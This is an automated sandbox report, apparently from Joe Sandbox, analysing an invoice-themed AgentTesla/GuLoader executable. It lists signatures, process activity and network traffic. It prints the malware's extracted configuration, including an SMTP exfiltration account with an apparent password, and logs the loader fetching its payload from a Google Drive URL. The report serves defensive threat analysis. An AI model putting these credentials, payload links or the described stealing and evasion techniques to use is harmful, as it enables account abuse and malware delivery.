Loading ...

Play interactive tourEdit tour

Windows Analysis Report FAKTURA 9502461485.exe

Overview

General Information

Sample Name:FAKTURA 9502461485.exe
Analysis ID:530352
MD5:34ae2e779e3b63f6450aacbaa6b5ab1d
SHA1:0f7dc13bf5871f3ba281e064776371520b65bdd9
SHA256:5bf5fa8d817fb2902dc28de115286e963b6dd4f5940d00e017b9944172972b25
Infos:

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • FAKTURA 9502461485.exe (PID: 5892 cmdline: "C:\Users\user\Desktop\FAKTURA 9502461485.exe" MD5: 34AE2E779E3B63F6450AACBAA6B5AB1D)
    • conhost.exe (PID: 4060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • CasPol.exe (PID: 7824 cmdline: "C:\Users\user\Desktop\FAKTURA 9502461485.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 7068 cmdline: "C:\Users\user\Desktop\FAKTURA 9502461485.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 5288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • UserOOBEBroker.exe (PID: 6196 cmdline: C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding MD5: BCE744909EB87F293A85830D02B3D6EB)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "gulnaz@furteksdokuma.com.tr@Gulnaz159753mail.furteksdokuma.com.trforceconnor36@gmail.com"}

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1xfUz"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000000.4281032947.0000000000C10000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000005.00000002.9200234712.000000001DDB1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.9200234712.000000001DDB1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: CasPol.exe PID: 7068JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: CasPol.exe PID: 7068JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000005.00000000.4281032947.0000000000C10000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1xfUz"}
            Source: CasPol.exe.7068.5.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "gulnaz@furteksdokuma.com.tr@Gulnaz159753mail.furteksdokuma.com.trforceconnor36@gmail.com"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: FAKTURA 9502461485.exeVirustotal: Detection: 29%Perma Link
            Source: FAKTURA 9502461485.exeReversingLabs: Detection: 26%
            Source: FAKTURA 9502461485.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.11.20:49789 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 216.58.212.161:443 -> 192.168.11.20:49790 version: TLS 1.2

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1xfUz
            Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Joe Sandbox ViewIP Address: 116.202.203.61 116.202.203.61
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1xfUz6Q4yBDyDwxM8ow_8y-LmZtRoRBTm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/naj9881u9ko47t95uihbncisipqv3ulq/1638192300000/15863333049961931076/*/1xfUz6Q4yBDyDwxM8ow_8y-LmZtRoRBTm?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-14-5g-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49801 -> 116.202.203.61:587
            Source: global trafficTCP traffic: 192.168.11.20:49801 -> 116.202.203.61:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: CasPol.exe, 00000005.00000002.9200857434.000000001DE2E000.00000004.00000001.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
            Source: CasPol.exe, 00000005.00000002.9200234712.000000001DDB1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 00000005.00000002.9200234712.000000001DDB1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: CasPol.exe, 00000005.00000002.9207760801.000000001FF65000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9207548099.000000001FF3D000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9201595401.000000001DEB8000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9188427439.0000000000E36000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: CasPol.exe, 00000005.00000003.4426480149.0000000000EAF000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.4431938540.0000000000EA8000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9189229875.0000000000EA3000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: CasPol.exe, 00000005.00000002.9207548099.000000001FF3D000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9201595401.000000001DEB8000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9188427439.0000000000E36000.00000004.00000020.sdmp, CasPol.exe, 00000005.00000002.9189229875.0000000000EA3000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: CasPol.exe, 00000005.00000002.9207760801.000000001FF65000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9207548099.000000001FF3D000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9201595401.000000001DEB8000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9188427439.0000000000E36000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
            Source: CasPol.exe, 00000005.00000003.4426480149.0000000000EAF000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.4431938540.0000000000EA8000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9189229875.0000000000EA3000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: CasPol.exe, 00000005.00000002.9201595401.000000001DEB8000.00000004.00000001.sdmpString found in binary or memory: http://furteksdokuma.com.tr
            Source: CasPol.exe, 00000005.00000002.9201595401.000000001DEB8000.00000004.00000001.sdmpString found in binary or memory: http://mail.furteksdokuma.com.tr
            Source: CasPol.exe, 00000005.00000002.9207760801.000000001FF65000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9207548099.000000001FF3D000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9201595401.000000001DEB8000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9188427439.0000000000E36000.00000004.00000020.sdmp, CasPol.exe, 00000005.00000002.9189229875.0000000000EA3000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: UserOOBEBroker.exe, 00000012.00000002.9187314221.0000024D518A0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.microso
            Source: CasPol.exe, 00000005.00000002.9201317444.000000001DE8A000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9200234712.000000001DDB1000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9201540871.000000001DEB2000.00000004.00000001.sdmpString found in binary or memory: http://v5ifWTQoxKpuwYqKikIm.org
            Source: CasPol.exe, 00000005.00000002.9200234712.000000001DDB1000.00000004.00000001.sdmpString found in binary or memory: http://vyecoW.com
            Source: CasPol.exe, 00000005.00000003.4426480149.0000000000EAF000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: CasPol.exe, 00000005.00000003.4426480149.0000000000EAF000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
            Source: CasPol.exe, 00000005.00000003.4431938540.0000000000EA8000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9189112678.0000000000E96000.00000004.00000020.sdmpString found in binary or memory: https://doc-14-5g-docs.googleusercontent.com/
            Source: CasPol.exe, 00000005.00000002.9189112678.0000000000E96000.00000004.00000020.sdmpString found in binary or memory: https://doc-14-5g-docs.googleusercontent.com//
            Source: CasPol.exe, 00000005.00000003.4431938540.0000000000EA8000.00000004.00000001.sdmpString found in binary or memory: https://doc-14-5g-docs.googleusercontent.com/DD
            Source: CasPol.exe, 00000005.00000003.4426480149.0000000000EAF000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.4431938540.0000000000EA8000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9189229875.0000000000EA3000.00000004.00000020.sdmpString found in binary or memory: https://doc-14-5g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/naj9881u
            Source: CasPol.exe, 00000005.00000002.9188774558.0000000000E62000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
            Source: CasPol.exe, 00000005.00000002.9190290777.0000000000F30000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1xfUz6Q4yBDyDwxM8ow_8y-LmZtRoRBTm
            Source: CasPol.exe, 00000005.00000002.9188901315.0000000000E76000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1xfUz6Q4yBDyDwxM8ow_8y-LmZtRoRBTmr
            Source: CasPol.exe, 00000005.00000002.9207760801.000000001FF65000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9207548099.000000001FF3D000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9201595401.000000001DEB8000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9188427439.0000000000E36000.00000004.00000020.sdmpString found in binary or memory: https://sectigo.com/CPS0
            Source: CasPol.exe, 00000005.00000002.9200234712.000000001DDB1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1xfUz6Q4yBDyDwxM8ow_8y-LmZtRoRBTm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/naj9881u9ko47t95uihbncisipqv3ulq/1638192300000/15863333049961931076/*/1xfUz6Q4yBDyDwxM8ow_8y-LmZtRoRBTm?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-14-5g-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.11.20:49789 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 216.58.212.161:443 -> 192.168.11.20:49790 version: TLS 1.2
            Source: FAKTURA 9502461485.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00921130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0092BA30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00923A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00924320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00929578
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0092C790
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00923708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_009980E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00992B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_010A9188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_010AC7C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_010A4EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_010A3330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1DBC5E08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1DBC46C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1DBC5DC1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1DBC6AF1
            Source: FAKTURA 9502461485.exe, 00000001.00000002.4455886675.0000000002250000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAfterpains9.exeFE2X vs FAKTURA 9502461485.exe
            Source: FAKTURA 9502461485.exe, 00000001.00000002.4454646701.0000000000424000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAfterpains9.exe vs FAKTURA 9502461485.exe
            Source: FAKTURA 9502461485.exeBinary or memory string: OriginalFilenameAfterpains9.exe vs FAKTURA 9502461485.exe
            Source: FAKTURA 9502461485.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dll
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exeSection loaded: edgegdi.dll
            Source: FAKTURA 9502461485.exeVirustotal: Detection: 29%
            Source: FAKTURA 9502461485.exeReversingLabs: Detection: 26%
            Source: FAKTURA 9502461485.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: unknownProcess created: C:\Users\user\Desktop\FAKTURA 9502461485.exe "C:\Users\user\Desktop\FAKTURA 9502461485.exe"
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FAKTURA 9502461485.exe"
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FAKTURA 9502461485.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\oobe\UserOOBEBroker.exe C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FAKTURA 9502461485.exe"
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FAKTURA 9502461485.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeFile created: C:\Users\user\AppData\Local\Temp\~DFA363D71F6717A72C.TMPJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/2@3/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4060:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5288:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4060:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5288:304:WilStaging_02
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000005.00000000.4281032947.0000000000C10000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeCode function: 1_2_00406D41 push ss; retf
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeCode function: 1_2_00409164 push 8069A23Bh; retf
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeCode function: 1_2_00406B87 push ebp; ret
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeCode function: 1_2_02C10178 push edi; retf
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeCode function: 1_2_02C10F59 push ecx; retf
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeCode function: 1_2_02C12CB4 push ecx; ret
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeCode function: 1_2_02C13C14 push ecx; iretd
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
